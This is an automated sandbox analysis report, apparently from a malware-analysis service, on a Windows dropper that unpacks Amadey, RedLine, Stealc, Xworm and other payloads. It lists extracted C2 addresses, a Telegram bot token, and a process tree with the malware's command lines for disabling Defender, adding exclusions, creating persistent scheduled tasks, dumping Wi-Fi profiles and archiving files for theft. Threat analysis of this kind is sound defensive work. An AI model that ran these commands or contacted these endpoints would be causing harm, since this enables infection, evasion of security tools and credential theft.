Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-04-2024 11:52

General

  • Target

    7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe

  • Size

    1.8MB

  • MD5

    bf566129575a45e4eb59063f364913ef

  • SHA1

    82ab797499cbf9faec158bb55bfef2c24086bc4a

  • SHA256

    7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0

  • SHA512

    2d1f0aeea9ac9efd2e8071f0696b1c4afecb9748a2a458b799c5fd67b58b4521d1257e30f8fceea9e57a657d3259044cca355ab2a78880cd6bafb43e964560f8

  • SSDEEP

    24576:2dqrbnKGO+sgYNJQX1iSb0UcpxhT0t+AyPZx2ApfZ6t2Bc1eaCzHbSDAyjkegasm:a6vcvxhpfgtume1GjkFasi/9d1lF+rv

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:7000

91.92.252.220:7000

41.199.23.195:7000

saveclinetsforme68465454711991.publicvm.com:7000

Mutex

bBT8anvIxhxDFmkf

Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

aes.plain

Extracted

Family

redline

Botnet

cheat

C2

saveclinetsforme68465454711991.publicvm.com:1111

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 2 IoCs
  • Detect ZGRat V1 3 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 13 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
    "C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:4452
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:3124
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:916
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 900
            3⤵
            • Program crash
            PID:4480
        • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
          "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:4844
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:4508
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                3⤵
                  PID:3132
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                    PID:920
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4984
                    • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3932
                    • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4664
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                      4⤵
                        PID:4448
                        • C:\Windows\SysWOW64\choice.exe
                          choice /C Y /N /D Y /T 3
                          5⤵
                            PID:1264
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 420
                        3⤵
                        • Program crash
                        PID:1632
                    • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2132
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        3⤵
                          PID:4696
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 388
                          3⤵
                          • Program crash
                          PID:2368
                      • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4596
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                          3⤵
                          • Creates scheduled task(s)
                          PID:3824
                        • C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4784
                        • C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4284
                        • C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:3076
                      • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3024
                      • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4268
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          3⤵
                            PID:2400
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            3⤵
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3840
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                          2⤵
                          • Loads dropped DLL
                          PID:3396
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                            3⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3984
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profiles
                              4⤵
                                PID:1900
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\341999741358_Desktop.zip' -CompressionLevel Optimal
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1332
                          • C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"
                            2⤵
                            • UAC bypass
                            • Windows security bypass
                            • Executes dropped EXE
                            • Windows security modification
                            • Checks whether UAC is enabled
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            • System policy modification
                            PID:2756
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2424
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                              3⤵
                                PID:4248
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4748
                                • C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe
                                  "C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4180
                                • C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe
                                  "C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:3916
                                • C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe
                                  "C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5032
                                • C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe
                                  "C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --silent --allusers=0
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Modifies system certificate store
                                  PID:2088
                                  • C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe
                                    C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f51e1d0,0x6f51e1dc,0x6f51e1e8
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:4580
                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe
                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe" --version
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:2296
                                  • C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe
                                    "C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2088 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429115429" --session-guid=77eaa7be-3765-456f-a6fc-0cc9a32a7783 --server-tracking-blob="NTIwYjNjOTU0ZDg2NjNmZjgxNzNiYjQxN2Y5NTBiZTIwNDhkNmEwM2VmMWQ2M2VlNGEyMjA3MGFlZTA1Yzg5Zjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzkxNjY0LjYzMjIiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYzcyOGNjMmQtZGU3ZC00MzYxLTk3ZTEtOThiNzJmMjRhYzIyIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2C04000000000000
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Enumerates connected drives
                                    PID:2916
                                    • C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe
                                      C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6eb9e1d0,0x6eb9e1dc,0x6eb9e1e8
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2148
                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2324
                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --version
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:3744
                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xfe6038,0xfe6044,0xfe6050
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1676
                                • C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe
                                  "C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:1452
                                  • C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe
                                    .\Install.exe /WkfdidVYT "385118" /S
                                    5⤵
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Enumerates system info in registry
                                    PID:4052
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      6⤵
                                        PID:1728
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          7⤵
                                            PID:2344
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              8⤵
                                                PID:3944
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  9⤵
                                                    PID:2172
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                7⤵
                                                  PID:3480
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    8⤵
                                                      PID:3580
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        9⤵
                                                          PID:3952
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                      7⤵
                                                        PID:1764
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                          8⤵
                                                            PID:3120
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              9⤵
                                                                PID:4196
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                            7⤵
                                                              PID:880
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                8⤵
                                                                  PID:960
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    9⤵
                                                                      PID:2320
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                  7⤵
                                                                    PID:1432
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                      8⤵
                                                                        PID:3984
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          9⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3192
                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                            10⤵
                                                                              PID:4688
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                      6⤵
                                                                        PID:1904
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                          7⤵
                                                                            PID:72
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                              8⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2164
                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                9⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2216
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 11:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe\" Wt /LmNdidrjZR 385118 /S" /V1 /F
                                                                          6⤵
                                                                          • Drops file in Windows directory
                                                                          • Creates scheduled task(s)
                                                                          PID:2120
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
                                                                          6⤵
                                                                            PID:1076
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                              7⤵
                                                                                PID:2708
                                                                                • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                                  8⤵
                                                                                    PID:4872
                                                                          • C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe
                                                                            "C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe"
                                                                            4⤵
                                                                            • Modifies firewall policy service
                                                                            • Windows security bypass
